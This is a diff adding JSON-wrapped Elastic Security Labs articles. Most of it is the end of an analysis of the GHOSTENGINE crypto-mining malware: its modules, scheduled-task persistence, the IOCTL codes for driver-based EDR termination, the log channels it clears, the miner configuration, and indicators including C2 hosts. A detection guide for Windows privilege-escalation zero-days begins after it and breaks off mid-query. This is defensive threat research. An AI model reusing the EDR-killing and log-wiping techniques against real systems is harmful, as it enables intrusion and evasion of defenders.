backup IP in case domains are unavailable. Additionally, it employs FTP as a secondary protocol with embedded credentials. The following is a summary of the execution flow:\n\n\n\nThis script downloads and executes `clearn.png`, a component designed to purge the system of remnants from prior infections belonging to the same family but different campaign; it removes malicious files under `C:\\Program Files\\Common Files\\System\\ado` and `C:\\PROGRA~1\\COMMON~1\\System\\ado\\` and removes the following scheduled tasks by name:\n\n* `Microsoft Assist Job`\n* `System Help Center Job`\n* `SystemFlushDns`\n* `SystemFlashDnsSrv`\n\nEvidence of those scheduled task artifacts may be indicators of a prior infection.\n\n\n\nDuring execution, it attempts to disable Windows Defender and clean the following Windows event log channels: \n\n* `Application`\n* `Security`\n* `Setup`\n* `System`\n* `Forwarded Events`\n* `Microsoft-Windows-Diagnostics-Performance`\n* `Microsoft-Windows-AppModel-Runtime/Operational`\n* `Microsoft-Windows-Winlogon/Operational`\n\n\n\n`get.png` disables Windows Defender, enables remote services, and clears the contents of:\n\n* `C:\\Windows\\Temp\\`\n* `C:\\Windows\\Logs\\`\n* `C:\\$Recycle.Bin\\`\n* `C:\\windows\\ZAM.krnl.trace`\n\n\n\n`get.png` also verifies that the `C:\\` volume has at least 10 MB of free space to download files, storing them in `C:\\Windows\\Fonts`. If not, it will try to delete large files from the system before looking for another suitable volume with sufficient space and creating a folder under `$RECYCLE.BIN\\Fonts`.\n\nTo get the current DNS resolution for the C2 domain names, GHOSTENGINE uses a hardcoded list of DNS servers, `1.1.1.1` and `8.8.8.8`.\n\nNext, to establish persistence, `get.png` creates the following scheduled tasks as `SYSTEM`:\n\n* **OneDriveCloudSync** using `msdtc `to run the malicious service DLL `C:\\Windows\\System32\\oci.dll` every 20 minutes (described later)\n* **DefaultBrowserUpdate** to run `C:\\Users\\Public\\run.bat,` which downloads the `get.png` script and executes it every 60 minutes\n* **OneDriveCloudBackup** to execute `C:\\Windows\\Fonts\\smartsscreen.exe` every 40 minutes\n \n\n\n`get.png` terminates all `curl.exe` processes and any PowerShell process with `*get.png*` in its command line, excluding the current process. This is a way to terminate any concurrently running instance of the malware.\n\nThis script then downloads `config.txt`, a JSON file containing the hashes of the PE files it retrieved. This file verifies whether any updated binaries are to be downloaded by checking the hashes of the previously downloaded files from any past infections.\n\n\n\nFinally,` get.png` downloads all of its modules and various PE files. Below is a table containing a description of each downloaded file:\n\n| path | Type | Description |\n|------------------------------------------------|-------------------|--------------------------------------------------------------------------------------------------------------------------------------------|\n| `C:\\Windows\\System32\\drivers\\aswArPots.sys` | Kernel driver | Vulnerable driver from Avast |\n| `C:\\Windows\\System32\\drivers\\IObitUnlockers.sys` | Kernel driver | Vulnerable driver from IObit |\n| `C:\\Windows\\Fonts\\curl.exe` | PE executable | Used to download files via cURL |\n| `C:\\Windows\\Fonts\\smartsscreen.exe` | PE executable | Core payload (GHOSTENGINE), its main purpose is to deactivate security instrumentation, complete initial infection, and execute the miner. |\n| `C:\\Windows\\System32\\oci.dll` | Service DLL | Persistence/updates module |\n| `backup.png` | Powershell script | Backdoor module |\n| `kill.png` | Powershell script | A PowerShell script that injects and executes a PE file responsible for killing security sensors |\n\n### GHOSTENGINE modules\n\nGHOSTENGINE deploys several modules that can tamper with security tools, create a backdoor, and check for software updates.\n\n#### EDR agent controller and miner module: smartsscreen.exe\n\nThis module primarily terminates any active EDR agent processes before downloading and installing a crypto-miner.\n\n\n\nThe malware scans and compares all the running processes with a hardcoded list of known EDR agents. If there are any matches, it first terminates the security agent by leveraging the Avast Anti-Rootkit Driver file `aswArPots.sys` with the IOCTL `0x7299C004` to terminate the process by PID.\n\n`smartscreen.exe` is then used to delete the security agent binary with another vulnerable driver, `iobitunlockers.sys` from IObit, with the IOCTL `0x222124`.\n\n`smartscreen.exe` then downloads the XMRig client mining program (`WinRing0x64.png`) from the C2 server as `taskhostw.png`. Finally, it executes XMRig, its drivers, and the configuration file `config.json`, starting the mining process.\n\n\n\n#### Update/Persistence module: oci.dll\n\nThe PowerShell script creates a service DLL (`oci.dll`), a phantom DLL loaded by `msdtc`. The DLL's architecture varies depending on the machine; it can be 32-bit or 64-bit. Its primary function is to create system persistence and download any updates from the C2 servers by downloading the `get.png` script from the C2 and executing it.\n\n\n\nEvery time the msdtcservice starts, it will load oci.dll to spawn the PowerShell one-liner that executes get.png : \n\n\n\n#### EDR agent termination module: `kill.png`\n\n`kill.png` is a PowerShell script that injects shellcode into the current process, decrypting and loading a PE file into memory.\n\n\n\nThis module is written in C++, and the authors have integrated redundancy into its operation. This redundancy is evident in the replication of the technique used in `smartsscreen.exe` to terminate and delete EDR agent binaries; it continuously scans for any new processes.\n\n\n\n#### Powershell backdoor module: `backup.png`\n\nThe PowerShell script functions like a backdoor, enabling remote command execution on the system. It continually sends a Base64-encoded JSON object containing a unique ID, derived from the current time and the computer name while awaiting base64-encoded commands. The results of those commands are then sent back.\n\n\n\nIn this example `eyJpZCI6IjE3MTU2ODYyNDA3MjYyNiIsImhvc3QiOiJhbmFseXNpcyJ9` is the Base64-encoded JSON object:\n\n\n\n```\n$ echo \"eyJpZCI6IjE3MTU2ODYyNDA3MjYyNiIsImhvc3QiOiJhbmFseXNpcyJ9\" | base64 -D\n{\"id\":\"171568624072626\",\"host\":\"analysis\"}\n```\n\n## Miner configuration\n\nXMRig is a legitimate crypto miner, and they have documented the configuration file usage and elements [here](https://xmrig.com/docs/miner/config). As noted at the beginning of this publication, the ultimate goal of the REF4578 intrusion set was to gain access to an environment and deploy a persistent Monero crypto miner, XMRig.\n\nWe extracted the configuration file from the miner, which was tremendously valuable as it allowed us to report on the Monero Payment ID and track the worker and pool statistics, mined cryptocurrency, transaction IDs, and withdrawals.\n\nBelow is an excerpt from the REF4578 XMRig configuration file:\n\n```\n{\n \"autosave\": false,\n \"background\": true,\n \"colors\": true,\n\n...truncated...\n\n \"donate-level\": 0,\n \"donate-over-proxy\": 0,\n \"pools\": [\n {\n \"algo\": \"rx/0\",\n \"coin\": \"monero\",\n \"url\": \"pool.supportxmr[.]com:443\",\n \"user\": \"468ED2Qcchk4shLbD8bhbC3qz2GFXqjAUWPY3VGbmSM2jfJw8JpSDDXP5xpkMAHG98FHLmgvSM6ZfUqa9gvArUWP59tEd3f\",\n \"keepalive\": true,\n \"tls\": true\n\n...truncated...\n\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\",\n \"verbose\": 0,\n \"watch\": true,\n \"pause-on-battery\": false,\n \"pause-on-active\": false\n}\n```\n\n### Monero Payment ID\n\nMonero is a blockchain cryptocurrency focusing on obfuscation and fungibility to ensure anonymity and privacy. The [Payment ID](https://www.getmonero.org/resources/moneropedia/paymentid.html) is an arbitrary and optional transaction attachment that consists of 32 bytes (64 hexadecimal characters) or 8 bytes (in the case of integrated addresses).\n\nUsing the Payment ID from the above configuration excerpt (`468ED2Qcchk4shLbD8bhbC3qz2GFXqjAUWPY3VGbmSM2jfJw8JpSDDXP5xpkMAHG98FHLmgvSM6ZfUqa9gvArUWP59tEd3f`) we can view the worker and pool statistics on one of the [Monero Mining Pool site](https://monero.hashvault.pro/en/)s listed in the configuration. \n\n\n\nAdditionally, we can see the transaction hashes, which we can look up on the Monero blockchain explorer. Note that while transactions date back four months ago, this only indicates the _potential_ monetary gain by this specific worker and account.\n\n\n\nUsing the Blockchain Explorer and one of the [transaction hashes](https://monero.hashvault.pro/explorer/prove/7c106041de7cc4c86cb9412a43cb7fc0a6ad2c76cfdb0e03a8ef98dd9e744442/468ED2Qcchk4shLbD8bhbC3qz2GFXqjAUWPY3VGbmSM2jfJw8JpSDDXP5xpkMAHG98FHLmgvSM6ZfUqa9gvArUWP59tEd3f/f1415e7710323cf769ce74d57ec9b7337d7a61b9ee4bba2ee38f9e8c3c067a005a484f8b9a14fb8964f56bb76181eafdb7dbb00677a155b067204423f23ab50ad146867795f560ad9443520f073f0bd71b8afd3259b24ae2a59aa7772f68fc028388f001bfeaa0f4ccc1f547b54924bb116352e9302424d731dc580dcccbb40749503640895d31559d7fc258b616576e7f052bbdbbc7083126f595c36015de02f6e95da8cfc81ee5fa1bd4d4c29bf55db96e4779924ab0d26993f7bf834ceb01fe314fd19e55c7304f91e809be3e29b68778f0da6dbcfe57d3eafc6dae5e090645d6b3753f44c4e1c1356b19d406c6efe7a55ec7c2b4997bd1fc65f15a4fda03619fc53beff111ddd9fd94f5ba3c503ccb73f52009bd3c1d47216b9a7c82d5065ac5e8a946e998cbc23fd8815a93cbbd655961709ac3ea8b1fd87e940e72370dc542ca4c22837e91ab5dd94d2c1c0a81e8ec9558766575ba236c3ae29b0f470fe881e22a03da405118a3353a5ecc618d1837e1a2bd449888a47a761efa98c407ce857fd389cdea63e9670edcf4b4d6c4c33e9c2851430270c8ef6dfb8cfeb9025ca7a17c9acdbfeb6670b3eabcbfde36cbc907e23fdd0c64aa2fc4103412a70c97838e177184c2f3d794e089b47ce66656d6c4cab2bbb4d6d71a3245f1dc360c7da9220eec90ef6e67cb13831b52ef14cf5bf1dd6adc202edc0892d9529145047786ed1042857f6986ed608839d595f06c1971f415f967d260d17ea8f5582400) we got from the Payment ID, we can see the public key, the amount is withdrawn, and when. Note that these public keys are used with one-time addresses, or stealth addresses that the adversary would then use a private key with to unlock the funds.\n\n\n\nIn the above example for transaction `7c106041de7cc4c86cb9412a43cb7fc0a6ad2c76cfdb0e03a8ef98dd9e744442` we can see that there was a withdrawal of `0.109900000000` XMR (the abbreviation for Monero) totaling $14.86 USD. The Monerao Mining Pool site shows four transactions of approximately the same amount of XMR, totaling approximately $60.70 USD (January - March 2024).\n\nAs of the publication of this research, there are still active miners connected to the REF4578 Payment ID.\n\n\n\nWhile this specific Payment ID does not appear to be a big earner, it is evident that REF4578 could operate this intrusion set successfully. Other victims of this campaign could have different Payment IDs used to track intrusions, which could be combined for a larger overall haul.\n\n## Malware and MITRE ATT&CK\n\nElastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that threats use against enterprise networks.\n\n### Tactics\n\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n* [Execution](https://attack.mitre.org/tactics/TA0002/)\n* [Persistence](https://attack.mitre.org/tactics/TA0003)\n* [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)\n* [Discovery](https://attack.mitre.org/tactics/TA0007)\n* [Command and Control](https://attack.mitre.org/tactics/TA0011)\n* [Exfiltration](https://attack.mitre.org/tactics/TA0010/)\n* [Impact](https://attack.mitre.org/tactics/TA0040/)\n\n### Techniques\n\nTechniques represent how an adversary achieves a tactical goal by performing an action.\n\n* [Command and Scripting Interpreter: PowerShell](https://attack.mitre.org/techniques/T1059/001/)\n* [Command and Scripting Interpreter: Windows Command Shell](https://attack.mitre.org/techniques/T1059/003/)\n* [Scheduled Task/Job: Scheduled Task](https://attack.mitre.org/techniques/T1053/005/)\n* [Indicator Removal: Clear Windows Event Logs](https://attack.mitre.org/techniques/T1070/001/)\n* [Masquerading](https://attack.mitre.org/techniques/T1036/)\n* [Process Injection](https://attack.mitre.org/techniques/T1055/)\n* [Process Discovery](https://attack.mitre.org/techniques/T1057/)\n* [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041/)\n* [Data Encoding](https://attack.mitre.org/techniques/T1132)\n* [Resource Hijacking](https://attack.mitre.org/techniques/T1496/)\n* [Service Stop](https://attack.mitre.org/techniques/T1489/)\n\n## Mitigating GHOSTENGINE\n\n### Detection\n\nThe first objective of the GHOSTENGINE malware is to incapacitate endpoint security solutions and disable specific Windows event logs, such as Security and System logs, which record process creation and service registration. Therefore, it is crucial to prioritize the detection and prevention of these initial actions:\n\n* Suspicious PowerShell execution\n* Execution from unusual directories\n* Elevating privileges to system integrity\n* Deploying vulnerable drivers and establishing associated kernel mode services.\n\nOnce the vulnerable drivers are loaded, detection opportunities decrease significantly, and organizations must find compromised endpoints that stop transmitting logs to their SIEM.\n\nNetwork traffic may generate and be identifiable if DNS record lookups point to [known mining pool](https://miningpoolstats.stream/monero) domains over well-known ports such as HTTP (`80`) and HTTPS (`443`). Stratum is also another popular network protocol for miners, by default, over port `4444`.\n\nThe analysis of this intrusion set revealed the following detection rules and behavior prevention events:\n\n* [Suspicious PowerShell Downloads](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/behavior/rules/execution_suspicious_powershell_downloads.toml)\n* [Service Control Spawned via Script Interpreter](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/privilege_escalation_service_control_spawned_script_int.toml)\n* [Local Scheduled Task Creation](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/persistence_local_scheduled_task_creation.toml)\n* [Process Execution from an Unusual Directory](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/defense_evasion_from_unusual_directory.toml)\n* [Svchost spawning Cmd](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/execution_command_shell_started_by_svchost.toml#L41)\n* [Unusual Parent-Child Relationship](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/execution_command_shell_started_by_svchost.toml#L41)\n* [Clearing Windows Event Logs](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/defense_evasion_clearing_windows_event_logs.toml)\n* [Microsoft Windows Defender Tampering](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/defense_evasion_microsoft_defender_tampering.toml)\n* [Potential Privilege Escalation via Missing DLL](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/behavior/rules/privilege_escalation_potential_privilege_escalation_via_missing_dll.toml)\n* [Binary Masquerading via Untrusted Path](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/behavior/rules/defense_evasion_binary_masquerading_via_untrusted_path.toml#L58)\n\n### Prevention\n\nMalicious Files Prevention : \n\n\n\nShellcode Injection Prevention:\n \n\n\nVulnerable Drivers file creation prevention ([Windows.VulnDriver.ArPot](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/yara/rules/Windows_VulnDriver_ArPot.yar) and [Windows.VulnDriver.IoBitUnlocker](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/yara/rules/Windows_VulnDriver_IoBitUnlocker.yar) )\n\n\n\n#### YARA\n\nElastic Security has created YARA rules to identify this activity. \n\n* [Windows Trojan GHOSTENGINE](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_GhostEngine.yar)\n* [Windows.VulnDriver.ArPot](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/yara/rules/Windows_VulnDriver_ArPot.yar)\n* [Windows.VulnDriver.IoBitUnlocker](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/yara/rules/Windows_VulnDriver_IoBitUnlocker.yar)\n\n## Observations\n\nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/ghostengine) in both ECS and STIX format.\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n|------------------------------------------------------------------|-----------|-------------------------------------------------------------|------------------------------------|\n| `2fe78941d74d35f721556697491a438bf3573094d7ac091b42e4f59ecbd25753` | SHA-256 | `C:\\Windows\\Fonts\\smartsscreen.exe` | GHOSTENGINE EDR controller module |\n| `4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1` | SHA-256 | `C:\\Windows\\System32\\drivers\\aswArPots.sys` | Avast vulnerable driver |\n| `2b33df9aff7cb99a782b252e8eb65ca49874a112986a1c49cd9971210597a8ae` | SHA-256 | `C:\\Windows\\System32\\drivers\\IObitUnlockers.sys` | Iobit vulnerable driver |\n| `3ced0552b9ecf3dfecd14cbcc3a0d246b10595d5048d7f0d4690e26ecccc1150` | SHA-256 | `C:\\Windows\\System32\\oci.dll` | Update/Persistence module (64-bit) |\n| `3b2724f3350cb5f017db361bd7aae49a8dbc6faa7506de6a4b8992ef3fd9d7ab` | SHA-256 | `C:\\Windows\\System32\\oci.dll` | Update/Persistence module (32-bit) |\n| `35eb368c14ad25e3b1c58579ebaeae71bdd8ef7f9ccecfc00474aa066b32a03f` | SHA-256 | `C:\\Windows\\Fonts\\taskhostw.exe` | Miner client |\n| `786591953336594473d171e269c3617d7449876993b508daa9b96eedc12ea1ca` | SHA-256 | `C:\\Windows\\Fonts\\config.json` | Miner configuration file |\n| `11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5` | SHA-256 | `C:\\Windows\\Fonts\\WinRing0x64.sys` | Miner driver |\n| `aac7f8e174ba66d62620bd07613bac1947f996bb96b9627b42910a1db3d3e22b` | SHA-256 | `C:\\ProgramData\\Microsoft\\DeviceSync\\SystemSync\\Tiworker.exe` | Initial stager |\n| `6f3e913c93887a58e64da5070d96dc34d3265f456034446be89167584a0b347e` | SHA-256 | `backup.png` | GHOSTENGINE backdoor module |\n| `7c242a08ee2dfd5da8a4c6bc86231985e2c26c7b9931ad0b3ea4723e49ceb1c1` | SHA-256 | `get.png` | GHOSTENGINE loader |\n| `cc4384510576131c126db3caca027c5d159d032d33ef90ef30db0daa2a0c4104` | SHA-256 | `kill.png` | GHOSTENGINE EDR termination module |\n| `download.yrnvtklot[.]com` | domain | | C2 server |\n| `111.90.158[.]40` | ipv4-addr | | C2 server |\n| `ftp.yrnvtklot[.]com` | domain | | C2 server |\n| `93.95.225[.]137` | ipv4-addr | | C2 server |\n| `online.yrnvtklot[.]com` | domain | | C2 server |\n\n## References\n\nThe following were referenced throughout the above research:\n\n* https://www.antiy.com/response/HideShoveling.html\n"
+ },
+ "title": "Invisible miners: unveiling GHOSTENGINE’s crypto mining operations",
+ "slug": "invisible-miners-unveiling-ghostengine",
+ "date": "2024-05-22",
+ "description": "Elastic Security Labs has identified REF4578, an intrusion set incorporating several malicious modules and leveraging vulnerable drivers to disable known security solutions (EDRs) for crypto mining.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "samir-bousseaden"
+ },
+ {
+ "slug": "terrance-dejesus"
+ },
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "ghostengine.jpg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ }
+ ],
+ "tags": [
+ "ref4578",
+ "ghostengine",
+ "xmrig",
+ "crypto",
+ "hiddenshovel"
+ ]
+ },
+ "id": "security_labs_content-invisible_miners_unveiling_ghostengine-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-itw_windows_lpe_0days_insights_and_detection_strategies-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-itw_windows_lpe_0days_insights_and_detection_strategies-md.json
new file mode 100644
index 00000000000..57896a71fc2
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-itw_windows_lpe_0days_insights_and_detection_strategies-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"In-the-Wild Windows LPE 0-days: Insights & Detection Strategies\"\nslug: \"itw-windows-lpe-0days-insights-and-detection-strategies\"\ndate: \"2024-03-29\"\ndescription: \"This article will evaluate detection methods for Windows local privilege escalation techniques based on dynamic behaviors analysis using Elastic Defend features.\"\nauthor:\n - slug: samir-bousseaden\nimage: \"image18.jpg\"\ncategory:\n - slug: security-operations\ntags:\n - slug: windows\n---\n\nBased on disclosures from [Microsoft](https://msrc.microsoft.com/update-guide/vulnerability), [Google](https://googleprojectzero.github.io/0days-in-the-wild/rca.html), [Kaspersky](https://securelist.com/windows-clfs-exploits-ransomware/111560/), [Checkpoint](https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/), and other industry players, it has become apparent that in-the-wild Windows local privilege escalation (LPE) zero-days are increasingly prevalent and essential components in sophisticated cybercrime and APT arsenals. It is important for detection engineers to closely examine these publicly accessible samples and assess possible avenues for detection. \n\nThis article will not delve into the root cause or specific details of the vulnerabilities; however, we do provide links to appropriate vulnerability research articles. We will evaluate the detection methods based on dynamic behaviors analysis using [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) features.\n\n## Case 1 - Common Log File System\n\n[The Common Log File System (CLFS)](https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/introduction-to-the-common-log-file-system) is a general-purpose logging service that can be used by software clients that need high-performance event logging. The [Microsoft Security Update Guide](https://msrc.microsoft.com/update-guide/) reveals that more than 30 CLFS vulnerabilities have been patched since 2018, 5 of which were observed during 2023 in ransomware attacks. 2024 also started with a [vulnerability report](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20653) targeting the same CLFS driver (submitted by several researchers).\n\nYou can find an excellent series of write-ups delving into the internals of CLFS exploits [here](https://securelist.com/windows-clfs-exploits-ransomware/111560/). \nOne thing that those exploits have in common is that they leverage a few ```clfsw32.dll``` APIs (```CreateLogFile``` and ```AddLogContainer```) to create and manipulate BLF logs, allowing them to write or corrupt a kernel mode address. Combined with other exploitation primitives, this can lead to a successful elevation.\n\nBased on the specifics of these vulnerabilities, a high-level detection can be designed to identify unusual processes. For example, a process running as low or medium integrity can create BLF files followed by unexpectedly performing a system integrity-level activity (spawning a system child process, API call, file, or registry manipulation with system privileges). \n\nThe following EQL query can be used to correlate Elastic Defend file events where the call stack contains reference of the user mode APIs ```CreateLogFile``` or ```AddLogContainerSet```, specifically when running as normal user followed by the creation of child process running as SYSTEM:\n\n```\nsequence with maxspan=5m\n [file where event.action != \"deletion\" and not user.id : \"S-1-5-18\" and user.id != null and \n _arraysearch(process.thread.Ext.call_stack, $entry, \n $entry.symbol_info: (\"*clfsw32.dll!CreateLogFile*\", \"*clfsw32.dll!AddLogContainerSet*\"))] by process.entity_id\n [process where event.action == \"start\" and user.id : \"S-1-5-18\"] by process.parent.entity_id\n```\n\nThe following example is of matches on CVE-2022-24521 where ```cmd.exe``` is started as SYSTEM:\n\n\n\n\nThe following EQL query uses similar logic to the previous one, but instead of spawning a child process, it looks for API, file, or registry activity with SYSTEM privileges following the BLF file event:\n\n```\nsequence by process.entity_id \n [file where event.action != \"deletion\" and not user.id : \"S-1-5-18\" and user.id != null and \n _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info : (\"*clfsw32.dll!CreateLogFile*\", \"*clfsw32.dll!AddLogContainerSet*\"))]\n [any where event.category : (\"file\", \"registry\", \"api\") and user.id : \"S-1-5-18\"]\n until [process where event.action:\"end\"] \n```\n\nThe following screenshot matches the cleanup phase of artifacts after the CLFS exploit elevated permissions (file deletion with system privileges):\n\n\n\n\nIn addition to the previous [two behavior detections](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts%20CLFS&type=code), we can also leverage YARA to hunt for unsigned PE files that import the user mode APIs ```CreateLogFile``` or ```AddLogContainerSet``` and an atypical number of functions from ```clfsw32.dll``` (normal CLFS clients programs would import more functions from the same DLL):\n\n```\nimport \"pe\" \n\nrule lpe_clfs_strings {\n strings:\n $s1 = \"NtQuerySystemInformation\"\n $s2 = \"clfs.sys\" nocase\n condition:\n uint16(0)==0x5a4d and (pe.imports(\"clfsw32.dll\", \"CreateLogFile\") or pe.imports(\"clfsw32.dll\", \"AddLogContainer\")) and all of ($s*)\n}\n\nrule lpe_clfs_unsigned {\n condition:\n uint16(0)==0x5a4d and pe.number_of_signatures == 0 and filesize <= 200KB and \n (pe.imports(\"clfsw32.dll\", \"CreateLogFile\") or pe.imports(\"clfsw32.dll\", \"AddLogContainer\")) and \n not (pe.imports(\"clfsw32.dll\", \"ReadLogRecord\") or pe.imports(\"clfsw32.dll\", \"CreateLogMarshallingArea\"))\n}\n```\n\nBelow is an example of a [VT match](https://www.virustotal.com/gui/file/afb715f9a6747b4ae74a7880b5a60eb236d205248b3a6689938e3b7ba6e703fa) using Elastic’s YARA rules for [CVE-2023-2825](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-28252):\n\n\n\nYARA rule match for CVE-2023-2825 \n\n## Case 2 - Windows DWM core library EoP\n\nDesktop Window Manager (```dwm.exe```) has been the compositing window manager in Microsoft Windows since Windows Vista. This program enables hardware acceleration to render the Windows graphical user interface and has high privileges; however, users with low privileges can interact with the DWM process, which significantly increases the attack surface. \n\nSecurity researcher [Quan Jin](https://twitter.com/jq0904) reported an in-the-wild vulnerability exploit for [CVE-2023-36033](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-36033), and a detailed [writeup](https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2023/CVE-2023-36033.html) explaining the exploit's stages was published later by Google Project Zero. \n\nBased on our understanding, a DWM Core Library (```dwmcore.dll```) vulnerability exploit will most likely trigger shellcode execution in the ```dwm.exe``` process while running with Window Manager\\DWM user privilege. Note that this is high integrity but not yet SYSTEM. \n\nDetonating the ITW public sample on Elastic Defend indeed triggers a self-injection shellcode alert. Without prior knowledge and context, one may confuse it with a generic code injection alert or false positive since it’s a self-injection alert by a Microsoft trusted system binary with a normal parent process and no loaded malicious libraries. \n\nThe following KQL hunt can be used to find similar shellcode alerts: \n\n```\nevent.code : \"shellcode_thread\" and process.name : \"dwm.exe\" and user.name : DWM*\n```\n\n\n\n\nOther than shellcode execution, we can also look for unusual activity in ```dwm.exe``` by baselining child processes and file activity. Below, we can see an example of ```dwm.exe``` spawning ```cmd.exe``` as a result of exploitation:\n\n\n\n\nBased on our telemetry visibility, ```dwm.exe``` rarely spawns legitimate child processes. The following [detection](https://github.com/elastic/protections-artifacts/blob/72fd8cad90189e9d145d22eb3d4fee2fe3d5902f/behavior/rules/privilege_escalation_unusual_desktop_window_manager_child_process.toml) can be used to find abnormal ones: \n\n```\nprocess where event.action == \"start\" and\n process.parent.executable : \"?:\\\\Windows\\\\system32\\\\dwm.exe\" and user.id : (\"S-1-5-90-0-*\", \"S-1-5-18\") and process.executable : \"?:\\\\*\" and \n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\", \"?:\\\\Windows\\\\System32\\\\ISM.exe\", \"?:\\\\Windows\\\\system32\\\\dwm.exe\")\n```\n\n\n\nTo further elevate privileges from the Window Manager\\DWM user to SYSTEM, the shellcode drops a DLL to disk and places a JMP hook on the ```kernelbase!MapViewOfFile``` calls within the ```dwm.exe``` process. It then triggers a logoff by executing the ```shutdown /l``` command. \n\nThe logoff action triggers the execution of the ```LogonUI.exe``` process, which runs as a SYSTEM user. The ```LogonUI.exe``` process will communicate with the Desktop Window Manager process similar to any desktop GUI process, which will marshal/unmarshal Direct Composition objects. \n\nThe ```MapViewOfFile``` hook inside ```dwm.exe``` monitors the mapped heap content. It modifies it with another set of crafted gadgets utilized to execute a ```LoadLibraryA``` call of the dropped DLL, when the resource heap data is unmarshalled within the ```LogonUI.exe``` process. \n\nThe two main detection points here occur when ```dwm.exe``` drops a PE file to disk and when ```LogonUI.exe``` loads a DLL, with the call stack pointing to ```dcomp.dll``` - an indicator of marshaling/unmarshaling Direct Composition objects. \n\nBelow is a KQL query that looks for ```dwm.exe``` by dropping a PE file to disk in both file events and malware alerts:\n\n```\n(event.category :\"file\" or event.code :\"malicious_file\") and \n\nprocess.name :\"dwm.exe\" and user.id:S-1-5-90-0-* and \n\n(file.extension :(dll or exe) or file.Ext.header_bytes :4d5a*) \n```\n\n\n\n\nBelow is a [detection](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/privilege_escalation_potential_privilege_escalation_via_logonui.toml) EQL query that looks for the LogonUI DLL load hijack: \n\n```\nlibrary where process.executable : \"?:\\\\Windows\\\\System32\\\\LogonUI.exe\" and \n user.id : \"S-1-5-18\" and \n not dll.code_signature.status : \"trusted\" and \n process.thread.Ext.call_stack_summary : \"*combase.dll|dcomp.dll*\"\n```\n\n\n\n\n## Case 3 - Windows Activation Context EoP\n\n[CVE-2022-41073](https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-41073.html) is another interesting in-the-wild vulnerability. The core vulnerability is that a user can remap the root drive (```C:\\```) for privileged processes during impersonation. [This specific sample](https://www.virustotal.com/gui/file/e8a94466e64fb5f84eea5d8d1ba64054a61abf66fdf85ac160a95b204b7b19f3/details) tricks the ```printfilterpipelinesvc.exe``` process to load an arbitrary DLL by redirecting the ```C:\\``` drive to ```C:\\OneDriveRoot``` during the [Activation Context](https://learn.microsoft.com/en-us/windows/win32/sbscs/activation-contexts) generation in the client server runtime subsystem (CSRSS). It then masquerades as the ```C:\\Windows\\WinSxS``` directory and is not writable by unprivileged users.\n\nFrom a behavioral perspective, it falls under the category of loading a DLL by a SYSTEM integrity process that was dropped by a low/medium integrity process. There is also a mark of masquerading as the legitimate Windows WinSxS folder.\n\nThe following EQL hunt can be used to find similar attempts to masquerade as trusted system folders for redirection: \n\n```\nany where (event.category in (\"file\", \"library\") or event.code : \"malicious_file\") and \n(\n file.path : (\"C:\\\\*\\\\Windows\\\\WinSxS\\\\*.dll\", \"C:\\\\*\\\\Windows\\\\system32\\\\*.dll\", \"C:\\\\*\\\\Windows\\\\syswow64\\\\*.dll\", \"C:\\\\*\\\\Windows\\\\assembly\\\\NativeImages*.dll\") or \n \n dll.path : (\"C:\\\\*\\\\Windows\\\\WinSxS\\\\*.dll\", \"C:\\\\*\\\\Windows\\\\system32\\\\*.dll\", 